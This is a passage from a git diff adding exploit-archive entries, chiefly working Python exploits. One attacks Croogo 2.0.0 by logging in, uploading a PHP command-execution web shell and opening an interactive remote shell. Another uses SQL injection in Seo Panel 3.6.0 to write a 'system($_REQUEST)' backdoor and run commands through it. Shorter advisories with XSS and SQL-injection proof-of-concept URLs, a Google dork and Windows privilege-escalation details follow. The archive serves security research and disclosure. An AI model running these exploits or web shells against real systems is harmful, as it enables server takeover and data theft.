+username = raw_input('\x20\x20[*] Enter username: ')
+password = raw_input('\x20\x20[*] Enter password: ')
+
+
+login_data = urllib.urlencode({
+ '_method' : 'POST',
+ 'data[User][password]' : password,
+ 'data[User][remember]' : '0',
+ 'data[User][username]' : username,
+ 'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:',
+ 'data[_Token][key]' : token_key,
+ 'data[_Token][unlocked]' : ''
+ })
+
+
+login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data)
+auth = login.read()
+
+for session in cj:
+ sessid = session.name
+
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+
+if re.search(r'Incorrect username or password', auth):
+ print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
+ print
+ sys.exit()
+else:
+ print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+
+getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
+csrfattach = getcsrfattach.read()
+token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1)
+print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET
+
+class MultiPartForm(object):
+
+ def __init__(self):
+ self.form_fields = []
+ self.files = []
+ self.boundary = mimetools.choose_boundary()
+ return
+
+ def get_content_type(self):
+ return 'multipart/form-data; boundary=%s' % self.boundary
+
+ def add_field(self, name, value):
+ self.form_fields.append((name, value))
+ return
+
+ def add_file(self, fieldname, filename, fileHandle, mimetype=None):
+ body = fileHandle.read()
+ if mimetype is None:
+ mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+ self.files.append((fieldname, filename, mimetype, body))
+ return
+
+ def __str__(self):
+
+ parts = []
+ part_boundary = '--' + self.boundary
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: form-data; name="%s"' % name,
+ '',
+ value,
+ ]
+ for name, value in self.form_fields
+ )
+
+ parts.extend(
+ [ part_boundary,
+ 'Content-Disposition: file; name="%s"; filename="%s"' % \
+ (field_name, filename),
+ 'Content-Type: %s' % content_type,
+ '',
+ body,
+ ]
+ for field_name, filename, content_type, body in self.files
+ )
+
+ flattened = list(itertools.chain(*parts))
+ flattened.append('--' + self.boundary + '--')
+ flattened.append('')
+ return '\r\n'.join(flattened)
+
+if __name__ == '__main__':
+
+ form = MultiPartForm()
+ form.add_field('_method', 'POST')
+ form.add_field('data[_Token][key]', token_key2)
+ form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A')
+ form.add_field('data[_Token][unlocked]', '')
+
+ form.add_file('data[Attachment][file]', 'zsl.php',
+ fileHandle=StringIO('\"; passthru($_GET[\'cmd\']); echo \"\"; ?>'))
+
+ request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
+ request.add_header('User-agent', 'joxypoxy 5.0')
+ body = str(form)
+ request.add_header('Content-type', form.get_content_type())
+ request.add_header('Cookie', cookie)
+ request.add_header('Content-length', len(body))
+ request.add_data(body)
+ request.get_data()
+ urllib2.urlopen(request).read()
+ print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+
+
+print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
+time.sleep(1)
+
+furl = '/uploads/zsl.php'
+#furl = '/webroot/uploads/zsl.php'
+
+print
+today = datetime.date.today()
+fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
+logging.basicConfig(filename=fname,level=logging.DEBUG)
+
+logging.info(' '+'+'*75)
+logging.info(' +')
+logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
+logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit')
+logging.info(' + Python program executed: '+sys.argv[0])
+logging.info(' + Version: '+version)
+logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
+logging.info(' + Username input: '+username)
+logging.info(' + Password input: '+password)
+logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
+logging.info(' +')
+logging.info(' + Advisory ID: ZSL-2014-5202')
+logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
+logging.info(' +')
+logging.info(' '+'+'*75+'\n')
+
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+ try:
+ cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+ execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
+ reverse = execute.read()
+ pattern = re.compile(r'(.*?)
',re.S|re.M)
+
+ print Style.BRIGHT+Fore.CYAN
+ cmdout = pattern.match(reverse)
+ print cmdout.groups()[0].strip()
+ print Style.RESET_ALL+Fore.RESET
+
+ if cmd.strip() == 'exit':
+ break
+
+ logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
+ except Exception:
+ break
+
+logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
+print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
+print
+
+sys.exit()
+
+#
+## OTHER ##
+#
+#
+# Arbitrary file creation any location:
+#
+# - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\
+#
+#
+# Arbitrary file upload any location:
+# - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C
+#
+#
+###########
+#
+# POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
+# Host: localhost
+# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
+# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
+# Connection: keep-alive
+# Content-Type: application/x-www-form-urlencoded
+# Content-Length: 229
+#
+# _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D=
+#
+###########
+#
+# POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1
+# Host: localhost
+# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php
+# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
+# Connection: keep-alive
+# Content-Type: application/x-www-form-urlencoded
+# Content-Length: 304
+#
+# _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D=
+#
+###########
+#
+# POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
+# Host: localhost
+# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
+# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
+# Connection: keep-alive
+# Content-Type: multipart/form-data; boundary=---------------------------25555888422431
+# Content-Length: 779
+#
+# -----------------------------25555888422431
+# Content-Disposition: form-data; name="_method"
+#
+# POST
+# -----------------------------25555888422431
+# Content-Disposition: form-data; name="data[_Token][key]"
+#
+# 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e
+# -----------------------------25555888422431
+# Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php"
+# Content-Type: application/octet-stream
+#
+# test
+#
+#
+# -----------------------------25555888422431
+# Content-Disposition: form-data; name="data[_Token][fields]"
+#
+# 6f3f788048d33beefcc340fe281cf758e20ad329%3A
+# -----------------------------25555888422431
+# Content-Disposition: form-data; name="data[_Token][unlocked]"
+#
+#
+# -----------------------------25555888422431--
+#
+#
diff --git a/platforms/php/webapps/34959.txt b/platforms/php/webapps/34959.txt
new file mode 100755
index 000000000..1d8d71dfc
--- /dev/null
+++ b/platforms/php/webapps/34959.txt
@@ -0,0 +1,210 @@
+?<<<
+
+Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
+
+
+Vendor: Fahad Ibnay Heylaal
+Product web page: http://www.croogo.org
+Affected version: 2.0.0
+
+Summary: Croogo is a free, open source, content management system
+for PHP, released under The MIT License. It is powered by CakePHP
+MVC framework.
+
+Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
+scripting vulnerabilities. Input passed to several POST parameters
+is not properly sanitised before being returned to the user. This
+can be exploited to execute arbitrary HTML and script code in a
+user's browser session in context of an affected site.
+
+Tested on: Apache/2.4.7 (Win32)
+ PHP/5.5.6
+ MySQL 5.6.14
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Zero Science Lab - http://www.zeroscience.mk
+Macedonian Information Security Research And Development Laboratory
+
+
+Advisory ID: ZSL-2014-5201
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php
+
+Vendor: http://blog.croogo.org/blog/croogo-210-released
+
+
+26.07.2014
+
+>>>
+
+
+------------------------
+(XSS #1)
+--------
+POST parameters:
+
+ - data[Contact][title]
+------------------------
+
+
+
+
+
+
+
+
+
+------------------------
+(XSS #2)
+--------
+POST/PUT parameters:
+
+ - data[Block][title]
+ - data[Block][alias]
+------------------------
+
+
+
+
+
+
+
+
+
+------------------------
+(XSS #3)
+--------
+POST parameters:
+
+ - data[Region][title]
+------------------------
+
+
+
+
+
+
+
+
+
+------------------------
+(XSS #4)
+--------
+POST parameters:
+
+ - data[Menu][title]
+ - data[Menu][alias]
+------------------------
+
+
+
+
+
+
+
+
+
+------------------------
+(XSS #5)
+--------
+POST parameters:
+
+ - data[Link][title]
+------------------------
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/34968.txt b/platforms/php/webapps/34968.txt
new file mode 100755
index 000000000..1c3c46535
--- /dev/null
+++ b/platforms/php/webapps/34968.txt
@@ -0,0 +1,42 @@
+Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin
+CVE: N/A
+Vendor: YourMembers plugin
+Product: https://github.com/YourMembers/yourmembers/tree/master/ym_trunk
+Affected version: Version 3, 29 June 2007 (https://github.com/YourMembers/yourmembers/blob/master/LICENSE)
+Google dork: inurl:ym_download_id=
+Fixed version: N/A
+Reported by: Tien Tran Dinh - tien.d.tran@itas.vn
+
+
+Details:
+
+The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from blind SQL injection:
+
+GET /?ym_download_id= HTTP/1.1
+Host: target.org
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: wfvt_2871549622=5434f2560126f; wpfront-notification-bar-landingpage=1; bp-activity-oldestpage=1; __utma=9793911.1350365293.1412756050.1412756050.1412756050.1; __utmb=9793911.1.10.1412756050; __utmc=9793911; __utmz=9793911.1412756050.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); all_RyDwsSBXVzZXJzGOTe_u0CDA-clickdesk_referrer=http%3A//www.google.com.vn/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26ved%3D0CB0QFjAA%26url%3Dhttp%253A%252F%252Fsdj
+Connection: keep-alive
+
+Vulnerable file: ym_trunk/includes/ym-download_functions.include.php
+Vulnerable code: (Line: 313 -> 329)
+ function ym_get_download($id=false) {
+ global $wpdb, $ym_dl_db;
+
+ $row = new stdClass();
+ $row->id = $row->title = $row->filename = $row->postDate = $row->members = $row->user = false;
+
+ if ($id) {
+ $sql = 'SELECT id, title, filename, postDate, members, user
+ FROM ' . $ym_dl_db . '
+ WHERE id = ' . $id;
+ $row = $wpdb->get_row($sql);
+ }
+
+ return $row;
+ }
+
+Credits: Thanks to Pham Kien Cuong (cuong.k.pham@itas.vn), Dang Quoc Thai (thai.d.dang@itas.vn), Le Ngoc Phi (phi.n.le@itas.vn)
\ No newline at end of file
diff --git a/platforms/php/webapps/34970.py b/platforms/php/webapps/34970.py
new file mode 100755
index 000000000..380e60705
--- /dev/null
+++ b/platforms/php/webapps/34970.py
@@ -0,0 +1,137 @@
+# Exploit Title: Seo Control Panel 3.6.0 Authenticated Sql Injection
+# Date: 10/10/2014
+# Exploit Author: Tiago Carvalho tcarvalho@dognaedis.com or tiago.alexandre@gmail.com
+# Vendor Homepage: www.seopanel.in
+# Software Link: http://www.seopanel.in/spdownload/
+# Version: Seo Panel Version 3.6.0
+# Tested on: Kali Linux and MAC OS X Mavericks
+# OSVDB ID: Requested
+"""
+This vulnerability affects Seo Control Panel -
+Product: Seo Panel Version 3.6.0
+Tested on PHP 5.4.4-14+deb7u14
+Vendor url :http://www.seopanel.in/
+Their are multiple vulnerabilitis in the project not all of them are
+exploitable
+The Flowing exploit is able to successfull bypass the implemented
+protections based on set of regex with along with a blacklist
+the protections are implemeted in the flowing file:
+
+file : includes/sp-load.php
+lines: 128 to 150
+
+The protection can easly be bypassed with payload used by this exploit
+
+The Vulnerable method exploited is located at:
+file: seo-plugins.php
+method: __getSeoPluginInfo
+lines: 175 to 178
+Due to incorrect use of database client api
+
+$ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
+[*] Upload was successfull!
+
+$ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
+total 12
+drwxrwxrwx 2 root root 4096 Oct 9 18:06 .
+drwxr-xr-x 14 root root 4096 Oct 9 11:31 ..
+- -rw-rw-rw- 1 mysql mysql 42 Oct 9 18:06 buckle.php
+"""
+
+#!/usr/bin/env python
+import sys
+import urllib2
+import urllib
+import cookielib
+"""
+ This vulnerability affects Seo Control Panel -
+ Product: Seo Panel Version 3.6.0
+ Tested on PHP 5.4.4-14+deb7u14
+ Vendor url :http://www.seopanel.in/
+ Their are multiple vulnerabilitis in the project not all of them are exploitable
+ The Flowing exploit is able to successfull bypass the implemented protections based on set of regex with along with a blacklist
+ the protections are implemeted in the flowing file:
+
+ file : includes/sp-load.php
+ lines: 128 to 150
+
+ The protection can easly be bypassed with payload used by this exploit
+
+ The Vulnerable method exploited is located at:
+ file: seo-plugins.php
+ method: __getSeoPluginInfo
+ lines: 175 to 178
+ Due to incorrect use of database client api
+
+ $ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
+ [*] Upload was successfull!
+
+ $ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
+ total 12
+ drwxrwxrwx 2 root root 4096 Oct 9 18:06 .
+ drwxr-xr-x 14 root root 4096 Oct 9 11:31 ..
+ -rw-rw-rw- 1 mysql mysql 42 Oct 9 18:06 buckle.php
+
+"""
+def exploit(host,path,username,password):
+ #POST Login content type
+ headers = {'Content-type': 'application/x-www-form-urlencoded'}
+
+ #payload creates a file in project_dir/tmp
+ payload = {'pid':'\' UNION/**/select/**/\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',"\<\?php system($_REQUEST[\'cmd\']);\?\>"/**/from/**/seoplugins/**/into/**/outfile/**/\'/var/www/seopanel/tmp/buckle.php'}
+
+ base_url = "http://"+host+path
+
+ #url
+ post_args = {'userName': username, 'password': password,'sec':'login','referer':base_url,'login':'Sign In >>'}
+
+ #login url
+ url_login = base_url+"/login.php"
+
+ #vulnerable url
+ url_plugins = base_url+"/seo-plugins.php"
+
+ cj = cookielib.CookieJar()
+ opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+ request = urllib2.Request(url_login)
+ request.add_data(urllib.urlencode(post_args))
+ request.add_header('Content-type', 'application/x-www-form-urlencoded')
+ login_request = opener.open(request)
+
+ code = int(login_request.code)
+ if code == 200:
+ try:
+ ##The server returns a http status 500 but even when the attack is successfull
+ opener.open(url_plugins,urllib.urlencode(payload))
+ except Exception, e:
+ if check(base_url) == True:
+ print "[*] Upload was successfull!"
+
+#call uploaded backdore and execute requested command
+def shell(url,command):
+ url_shell = url+'/tmp/buckle.php'
+ encoded_args = urllib.urlencode({'cmd':command})
+ return urllib2.urlopen(url_shell, encoded_args)
+
+
+#call uploaded backdore execute requested command and print the result
+def cmd(host,path,command):
+ url = "http://"+host+path
+ print shell(url,command).read()
+
+#check uploaded backdore is in place
+def check(url):
+ code = shell(url,"ls").code
+ if(code == 200):
+ return True
+ else:
+ return False
+
+if len(sys.argv) == 6:
+ if str(sys.argv[1]) == "e":
+ exploit(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]),str(sys.argv[5]))
+
+if len(sys.argv) == 5:
+ if str(sys.argv[1]) == "c":
+ cmd(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]))
+
diff --git a/platforms/php/webapps/34972.txt b/platforms/php/webapps/34972.txt
new file mode 100755
index 000000000..769ac7f6a
--- /dev/null
+++ b/platforms/php/webapps/34972.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/44694/info
+
+The AutoArticles 3000 component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_a3000&task=showarticle&id=1 [Blind Sql]
\ No newline at end of file
diff --git a/platforms/php/webapps/34973.txt b/platforms/php/webapps/34973.txt
new file mode 100755
index 000000000..e1e1dedcc
--- /dev/null
+++ b/platforms/php/webapps/34973.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44704/info
+
+The FeedList Plugin for Wordpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to FeedList 2.61.01 are vulnerable.
+
+http://www.example.com/wordpress/wp-content/plugins/feedlist/handler_image.php?i=%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34974.txt b/platforms/php/webapps/34974.txt
new file mode 100755
index 000000000..55c54eafc
--- /dev/null
+++ b/platforms/php/webapps/34974.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44707/info
+
+WP Survey And Quiz Tool for Wordpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WP Survey And Quiz Tool 1.2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-survey-and-quiz-tool/pages/admin/surveys/create.php?action=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/local/34648.txt b/platforms/windows/local/34648.txt
new file mode 100755
index 000000000..de41ab868
--- /dev/null
+++ b/platforms/windows/local/34648.txt
@@ -0,0 +1,4 @@
+Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz
+Mirror: www.exploit-db.com/sploits/sandbox_test1.tar.gz
+
+Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm
\ No newline at end of file
diff --git a/platforms/windows/local/34966.txt b/platforms/windows/local/34966.txt
new file mode 100755
index 000000000..5dfb4e339
--- /dev/null
+++ b/platforms/windows/local/34966.txt
@@ -0,0 +1,118 @@
+?
+Telefonica O2 Connection Manager 3.4 Local Privilege Escalation Vulnerability
+
+
+Vendor: Telefonica S.A.
+Product web page: http://www.telefonica.com | http://www.o2.co.uk
+Affected version: 3.4.R1 (108)
+
+Summary: O2 Connection Manager will help you to manage your internet
+connections by getting you connected to the fastest available network.
+Automatically connect you to the fastest available network including
+your home broadband if you have a wireless router.
+
+Desc: O2 Connection Manager suffers from an elevation of privileges
+vulnerability which can be used by a simple user that can change the
+executable files with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'F' flag (Full) for 'Everyone'
+group, making the entire directory 'O2 Connection Manager' and its
+files and sub-dirs world-writable.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5199
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5199.php
+
+
+22.09.2014
+
+---
+
+==========================================================================
+
+Arguments Used:
+ Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager"
+
+
+
+**************************************************************************
+Directory: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed \Everyone Special (Unknown) Files Only
+Allowed BUILTIN\Administrators Special (DCBA654321) This Folder and Files
+Allowed NT SERVICE\TrustedInsta Full Control This Folder Only
+Allowed NT SERVICE\TrustedInsta Special (Unknown) Subfolders only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Special (Unknown) Subfolders and Files
+Allowed BUILTIN\Administrators Full Control This Folder Only
+Allowed BUILTIN\Administrators Special (Unknown) Subfolders and Files
+Allowed BUILTIN\Users Read and Execute This Folder Only
+Allowed BUILTIN\Users Special (Unknown) Subfolders and Files
+Allowed \CREATOR OWNER Special (Unknown) Subfolders and Files
+
+No Auditing set
+
+Owner: NT AUTHORITY\SYSTEM
+**************************************************************************
+
+
+Operation Complete
+Elapsed Time: 0,234375 seconds.
+
+
+==========================================================================
+
+Arguments Used:
+ Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe"
+
+
+
+**************************************************************************
+File: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Administrators Special (DCBA654321) This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+Allowed BUILTIN\Users Read and Execute This Folder Only
+
+No Auditing set
+
+Owner: NT AUTHORITY\SYSTEM
+**************************************************************************
+
+
+Operation Complete
+Elapsed Time: 0,125 seconds.
+
+
+==========================================================================
+
+C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>icacls *.exe |findstr "Everyone:(I)(F)"
+Elevate.exe Everyone:(I)(F)
+locSrch.exe Everyone:(I)(F)
+md5sum.exe Everyone:(I)(F)
+patch.exe Everyone:(I)(F)
+ProfileImp.exe Everyone:(I)(F)
+SupportAssistant.exe Everyone:(I)(F)
+tscui.exe Everyone:(I)(F)
+vcredist_x86.exe Everyone:(I)(F)
+WifiProfileImportTool.exe Everyone:(I)(F)
+XAU.exe Everyone:(I)(F)
+
+C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>
+
+==========================================================================
diff --git a/platforms/windows/local/34967.txt b/platforms/windows/local/34967.txt
new file mode 100755
index 000000000..7dbf97ffb
--- /dev/null
+++ b/platforms/windows/local/34967.txt
@@ -0,0 +1,65 @@
+?
+Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation
+
+
+Vendor: Telefonica S.A.
+Product web page: http://www.telefonica.com | http://www.o2.co.uk
+Affected version: 8.7.6.792
+
+Summary: O2 Connection Manager will help you to manage your internet
+connections by getting you connected to the fastest available network.
+Automatically connect you to the fastest available network including
+your home broadband if you have a wireless router.
+
+Desc: The O2 Connection Manager's service suffers from an unquoted
+search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc'
+service for Windows. This could potentially allow an authorized but
+non-privileged local user to execute arbitrary code with elevated
+privileges on the system. A successful attempt would require the
+local user to be able to insert their code in the system root path
+undetected by the OS or other security applications where it could
+potentially be executed during application startup or reboot. If
+successful, the local user’s code would execute with the elevated
+privileges of the application.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5200
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5200.php
+
+
+22.09.2014
+
+---
+
+
+C:\>sc qc TGCM_ImportWiFiSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: TGCM_ImportWiFiSvc
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : TGCM_ImportWiFiSvc
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>icacls "C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe"
+C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+
+---